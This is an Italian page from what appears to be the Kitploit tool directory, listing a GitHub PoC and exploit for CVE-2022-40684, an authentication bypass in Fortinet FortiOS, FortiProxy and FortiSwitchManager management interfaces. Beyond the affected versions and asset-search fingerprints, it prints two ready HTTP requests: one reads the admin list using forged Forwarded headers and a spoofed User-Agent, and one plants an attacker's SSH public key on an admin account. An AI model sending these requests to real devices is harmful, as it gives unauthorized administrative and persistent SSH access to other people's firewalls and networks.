Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-40684 — PoC e exploit per CVE-2022-40684, un bypass di autenticazione nelle interfacce di gestione di Fortinet FortiOS, FortiProxy e FortiSwitchManager, che consente l'accesso amministrativo non autorizzato tramite richieste HTTP appositamente create. | Kitploit
Strumenti/GitHubGitHub/hughink/cve-2022-40684
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubhughink/cve-2022-40684

CVE-2022-40684

PoC e exploit per CVE-2022-40684, un bypass di autenticazione nelle interfacce di gestione di Fortinet FortiOS, FortiProxy e FortiSwitchManager, che consente l'accesso amministrativo non autorizzato tramite richieste HTTP appositamente create.

Vedi Repository
113243 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-40684

Rispetto della legge:

Ogni individuo e organizzazione che utilizza la rete deve rispettare le leggi costituzionali, l'ordine pubblico e la morale sociale, non deve compromettere la sicurezza della rete, né utilizzare la rete per danneggiare la sicurezza nazionale, l'onore e gli interessi.

Introduzione alla vulnerabilità:

Fortinet è un fornitore globalmente riconosciuto di prodotti per la sicurezza informatica e soluzioni di sicurezza. I suoi prodotti includono firewall, software antivirus, sistemi di prevenzione delle intrusioni e componenti di sicurezza per endpoint. Nell'interfaccia di amministrazione dei prodotti interessati FortiOS, FortiProxy e FortiSwitchManager, è possibile aggirare l'autenticazione utilizzando un percorso o canale alternativo e operare sull'interfaccia di amministrazione tramite richieste HTTP o HTTPS appositamente predisposte, senza autenticazione.

Livello di rischio :

Alto

Versioni interessate:

FortiOS versione 7.2.0 - 7.2.1

FortiOS versione 7.0.0 - 7.0.6

FortiProxy versione 7.2.0

FortiProxy versione 7.0.0 - 7.0.6

FortiSwitchManager versione 7.2.0

FortiSwitchManager versione 7.0.0

Identificazione degli asset:

title="FortiProxy“

title="FortiGate"

Riproduzione della vulnerabilità:

poc

image

root@kitploit:~
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

EXP

image

root@kitploit:~
PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json

{"ssh-public-key1": "\"公钥内容\""}

image

image

Scarica lo strumento